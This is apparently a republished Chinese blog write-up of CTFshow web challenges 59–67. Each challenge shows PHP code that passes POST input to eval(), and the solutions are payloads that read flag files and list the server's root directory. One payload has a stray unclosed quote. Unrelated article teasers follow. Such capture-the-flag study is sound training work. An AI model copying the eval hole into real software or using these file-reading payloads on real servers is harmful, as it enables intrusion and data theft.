CTFshow web(php命令执行59-67）

CTFshow web(php命令执行59-67）

news/2024/9/27 7:23:14/文章来源:https://blog.csdn.net/csjjjd/article/details/136106174

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);

payload:c=show_source('flag.php');

我还是那句话：如果不知道对面过滤了啥，那就一个一个尝试

解释：在 PHP 中，show_source() 是一个内置函数，用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数，并将该文件的内容以文本形式进行输出。

下面是我的文章对命令执行常用语句的总结：来源于：一篇文章带你进阶CTF命令执行-CSDN博客

我不想太多，一个个丢进去，看那个可以就是那个

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这里还是上一个payload：

c=show_source('flag.php');

或者：c=highlight_file('flag.php');

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这题是真的离谱，这个payload已经一路过关斩将了

c=show_source('flag.php');

当然得换个绕法：

c=include('flag.php);echo $flag;

这里是文件包含然后再输出变量

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web64

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web66

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

额，这波被制裁了，不能白嫖了，那就靠实力了！

c=print_r(scandir("/"));

这里首先先翻看根目录，查看源代码，接着发现了flag.txt

c=highlight_file('/flag.txt');

知道flag在根目录下面的flag.txt直接访问就好了

web67

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还是上面那道题目的方法：

payload:c=highlight_file('/flag.txt');

真诚希望我的文章能够帮助大家,谢谢！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/682278.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

一个 SpringBoot 项目能同时处理多少请求？

一个 SpringBoot 项目能同时处理多少请求？

目录 1 问题分析 2 Demo 3 答案 4 怎么来的？ 5 标准答案及影响参数一Tomcat配置 6 影响参数二 Web容器 7 影响参数三 Async 1 问题分析一个 SpringBoot 项目能同时处理多少请求？ 不知道你听到这个问题之后的第一反应是什么？ 我大概…

阅读更多...

支付交易——BIN服务

支付交易——BIN服务

摘要老王的杂货店里货很多，国产的，进口的，不同种类、不同品牌、不同型号的货，应有尽有。货多了，老王就弄了个小本本记下店里卖的货有哪些，记得很详细，包括有哪些种类，每个种类里有…

阅读更多...

ClickHouse--05--MergeTree 表引擎

ClickHouse--05--MergeTree 表引擎

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录 MergeTree 系列表引擎前言MergeTree 系列表引擎 --功能MergeTree 系列表引擎 --种类 1.MergeTree1.1MergeTree 建表语句：1.2 MergeTree 引擎表目录解析查…

阅读更多...

Acwing二分和前缀和（一）

Acwing二分和前缀和（一）

数的范围原题链接：https://www.acwing.com/problem/content/791/ 整数二分步骤，找一个区间，使得答案一定在区间中。找一个判断条件，使得该判断条件具有二段性，并且答案一定是该二段性的分界点。分析终点在该判断条件下…

阅读更多...

toString()、equals()、clone()用法

toString()、equals()、clone()用法

Java中所有类的对象都可以直接使用Object类中提供的一些方法 1. toString()：返回对象的字符串表示形式，通常在类中重写，以便于返回的是对象的内容 2. equals()：判断两个对象的地址是否相等，直接使用也一样，…

阅读更多...

社区店选址地理位置评估：大数据分析的力量

社区店选址地理位置评估：大数据分析的力量

大家好，我是一名有着 5 年开店经验的鲜奶吧创业者。在这 5 年的时间里，我深切地体会到了选址对于一家社区鲜奶吧的重要性。一个好的地理位置可以为你的店铺带来源源不断的客流，而一个糟糕的位置则可能让你的创业之路充满坎坷。在这里&#…

阅读更多...

Qt之条件变量QWaitCondition详解

Qt之条件变量QWaitCondition详解

QWaitCondition内部实现结构图： 相关系列文章 C之Pimpl惯用法目录 1.简介 2.示例 2.1.全局配置 2.2.生产者Producer 2.3.消费者Consumer 2.4.测试例子 3.原理分析 3.1.辅助函数CreateEvent 3.2.辅助函数WaitForSingleObject 3.3.QWaitConditionEvent …

阅读更多...

一个小例子，告诉你什么是衍生式设计

一个小例子，告诉你什么是衍生式设计

之前好多小伙伴想让我介绍介绍Dynamo与衍生式设计，奈何最近太忙了，实在没时间弄这些~趁着端午节，今天用一个小案例，先简单让大家对衍生式设计有个初步认识，之后有时间，我再多写几篇关于这方面的文章&#x…

阅读更多...

Java使用opencsv完成对csv批量操作

Java使用opencsv完成对csv批量操作

文章目录前言一、maven二、造数三、代码部分1.OpenCsvController2.OpenCsvUtil3.StudentInfo4.CodeToValue 三、效果展示1.download2.upload 总结前言 csv文件是不同于excel文件的另一种文件，常常以,作为分隔符，本篇将通过JavaBean的形式完成对csv文件…

阅读更多...

Linux_进程地址空间

Linux_进程地址空间

我们用c语言写的程序，经过编译后形成可执行程序存放在硬盘。当运行该程序时，操作系统将该程序加载到内存中，创建进程控制块，变为进程，然后开始执行该程序。大家是否想过，操作系统是如何加载的呢&#xff1b…

阅读更多...

25天物理探索旅程 - 第三天：相对论时空观的构建

25天物理探索旅程 - 第三天：相对论时空观的构建

第三天的课堂，我们将踏上一段穿越时空的奇幻旅程，探索那个由爱因斯坦用天才智慧构建起来的相对论世界。想象一下，你手握一把名为“狭义相对论”的神奇钥匙，准备开启一扇通往全新宇宙观的大门。首先，我们来聊聊同时性…

阅读更多...

【c语言】字符串常见函数下

【c语言】字符串常见函数下

🎈个人主页：甜美的江 🎉欢迎 👍点赞✍评论⭐收藏 🤗收录专栏：c语言 🤝希望本文对您有所裨益，如有不足之处，欢迎在评论区提出指正，让我们共同学习、交流进步&a…

阅读更多...

幻兽帕鲁Palworld服务器设置参数（汉化）

幻兽帕鲁Palworld服务器设置参数（汉化）

创建幻兽帕鲁服务器配置参数说明，Palworld服务器配置参数与解释，阿腾云atengyun.com分享： 自建幻兽帕鲁服务器教程： 阿里云教程 https://t.aliyun.com/U/bLynLC腾讯云教程 https://curl.qcloud.com/oRMoSucP 幻兽帕鲁服务器幻…

阅读更多...

如何使用idea连通服务器上的Redis（详细版本）

如何使用idea连通服务器上的Redis（详细版本）

这里我使用的是阿里云的服务器打开阿里云的安全组，设置端口为6379 在redis.conf文件中，注释bind 127.0.0.1 将protected-mode设置为no，即关闭保护模式更改服务器中的防火墙，放行6379端口 # 放行端口 firewall-cmd --zo…

阅读更多...

Nacos 的配置管理和配置热更新

Nacos 的配置管理和配置热更新

一、配置管理的必要性 1. 存在问题微服务重复配置过多维护成本高：将各个微服务的配置都写到配置管理服务中，单个微服务不去编写配置，而是到配置管理服务中读取配置，实现配置共享，便于修改和维护业务配置经常变动&a…

阅读更多...

【AI视野·今日CV 计算机视觉论文速览第299期】Mon, 29 Jan 2024

【AI视野·今日CV 计算机视觉论文速览第299期】Mon, 29 Jan 2024

AI视野今日CS.CV 计算机视觉论文速览 Mon, 29 Jan 2024 Totally 55 papers 👉上期速览✈更多精彩请移步主页 Daily Computer Vision Papers Annotated Hands for Generative Models Authors Yue Yang, Atith N Gandhi, Greg TurkGAN 和扩散模型等生成模型已经展示了…

阅读更多...

C++：priority_queue模拟实现

C++：priority_queue模拟实现

C：priority_queue模拟实现什么是priority_queue模拟实现向上调整算法向下调整算法插入与删除仿函数什么是priority_queue priority_queue称为优先级队列。优先级队列是一种特殊的队列，其中每个元素都有一个相关的优先级。元素的优先级决定了它们在队…

阅读更多...

$Python数学建模之回归分析$

Python数学建模之回归分析

1.基本概念及应用场景回归分析是一种预测性的建模技术，数学建模中常用回归分析技术寻找存在相关关系的变量间的数学表达式，并进行统计推断。例如，司机的鲁莽驾驶与交通事故的数量之间的关系就可以用回归分析研究。回归分析根据变量的…

阅读更多...

论文阅读：GamutMLP A Lightweight MLP for Color Loss Recovery

论文阅读：GamutMLP A Lightweight MLP for Color Loss Recovery

这篇文章是关于色彩恢复的一项工作，发表在 CVPR2023，其中之一的作者是 Michael S. Brown，这个老师是加拿大 York 大学的，也是 ISP 领域的大牛，现在好像也在三星研究院担任兼职，这个老师做了很多这种类似的工…

阅读更多...

系统架构25 - 软件架构设计（4）

系统架构25 - 软件架构设计（4）

软件架构复用软件产品线定义分类原因复用对象及形式基本过程软件产品线软件产品线是指一组软件密集型系统，它们共享一个公共的、可管理的特性集，满足某个特定市场或任务的具体需要，是以规定的方式用公共的核心资产集成开发出来的。即围绕…

阅读更多...

推荐文章

最新文章